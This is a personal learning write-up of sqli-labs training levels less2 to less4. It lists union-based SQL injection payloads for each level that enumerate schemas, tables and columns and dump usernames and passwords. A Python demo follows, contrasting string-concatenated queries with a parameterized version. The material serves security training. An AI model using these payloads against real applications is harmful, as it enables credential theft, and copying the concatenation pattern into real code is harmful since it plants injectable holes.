2021-10-29

SQL injection: my personal learning journey, part 2

less2

Similar to less1: first enter id=1', which produces an error, as shown in the figure.
As in less1, it is easy to work out that $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1". This time there are no quotes around $id, so there is no need to use --+ or # to comment out a trailing quote, because there simply isn't one. Everything else follows less1, so I won't go through it step by step again; the payloads are listed below.

1. id=1 order by 3
2. id=-1 union select 1,2,3
3. id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
4. id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"
5. id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"
6. id=-1 union select 1,username,password from users where id=1

less3

Again the same recipe with a small twist.
This time it is obvious that ('') replaces the '' used in less1.
The payloads are as follows:

1. id=1') order by 3--+
2. id=-1') union select 1,2,3--+
3. id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata--+
4. id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
5. id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+
6. id=-1') union select 1,username,password from users where id=1--+

less4

Once more the same recipe: this time ("") replaces the ('') from less1.
The figure and payloads are as follows:

1. id=1") order by 3--+
2. id=-1") union select 1,2,3--+
3. id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata--+
4. id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
5. id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"--+
6. id=-1") union select 1,username,password from users where id=1--+
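The three levels above differ only in how the id value is wrapped (bare, ('...'), ("...")); the root cause is the same in all of them: the parameter is pasted straight into the query string. As an added example (not part of this post or of sqli-labs), the script below rebuilds the three query templates over an in-memory SQLite table with constructed sample rows, runs the page's less2 column-count test through the concatenated query, and sets it beside the hardened form, which checks the type and binds the value as a parameter. The table contents and function names are my own assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table.
SAMPLE_USERS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")]

# The three ways the lab levels wrap $id into the query (from the post).
TEMPLATES = {
    "less2": "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    "less3": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
    "less4": 'SELECT * FROM users WHERE id=("{id}") LIMIT 0,1',
}


def make_db():
    """Create an in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, level, raw_id):
    """String concatenation, as the lab code does: raw_id is untrusted input."""
    sql = TEMPLATES[level].format(id=raw_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    """Hardened form: validate the type first, then bind the value as a parameter."""
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None  # non-numeric id: refuse to query at all
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)
    ).fetchall()


def demo():
    """Run the page's less2 column-count test through both lookups."""
    conn = make_db()
    payload = "-1 union select 1,2,3"
    return {
        "normal": vulnerable_lookup(conn, "less2", "1"),
        "vulnerable": vulnerable_lookup(conn, "less2", payload),  # returns (1, 2, 3)
        "safe": safe_lookup(conn, payload),  # returns None
    }


if __name__ == "__main__":
    print(demo())
```

The same payload produces an attacker-controlled row through string concatenation and is rejected outright by the parameterized version; the less3 and less4 templates fail the same way once the matching quote and parenthesis are supplied.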